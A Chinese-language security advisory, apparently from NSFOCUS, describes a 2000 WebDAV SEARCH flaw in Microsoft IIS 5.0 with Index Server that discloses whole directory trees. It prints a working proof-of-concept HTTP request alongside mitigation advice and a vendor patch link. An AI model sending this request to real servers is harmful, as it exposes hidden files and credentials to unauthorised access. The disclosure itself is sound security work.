微软IIS 5.0泄漏索引目录的漏洞

发布日期: 2000-10-6

更新日期: 2000-10-6
受影响的系统: Microsoft IIS 5.0
+ Microsoft Windows NT 2000

描述:
--------------------------------------------------------------------------------

如果IIS 5.0中的Index Server被允许的话，远程用户就可能察看整个根目录结构以及所有子目录，这是因为WebDAV的查找实现中存在一个缺陷。隐藏目录、包含文件（*.inc）或其它在正常的网站界面中一般不能存取的文档就会由于这个漏洞而泄漏。
成功地利用这个漏洞就可能找到那些可能包含敏感信息如用户名和密码的特定文件。
默认情况下IIS 5.0中的Index Server是被禁止的，只有设置了“Index”属性的目录才会受到这个漏洞的影响。

<* 来源：David Litchfield <dlitchfield@atstake.com> *>

测试程序：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

发送如下的请求给服务器：
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

--------------------------------------------------------------------------------
建议:
临时解决办法：

NSFOCUS建议您使用微软提供的解决方案：
如果您没有使用Index Server（比如您的网站中没有需要查找的内容），禁止或卸载该服务。或者将包含敏感信息的目录的“Index this resource”的选项禁止。

厂商补丁：

微软已发布一篇知识库文章详细描述了这个问题的解决方法，可以在如下的位置找到这篇文章：
http://www.microsoft.com/technet/support/kb.asp?ID=272079

中联绿盟翻译整理，未经许可，不得转载
欢迎访问我们的站点http://www.nsfocus.com/
中联绿盟给您安全的保障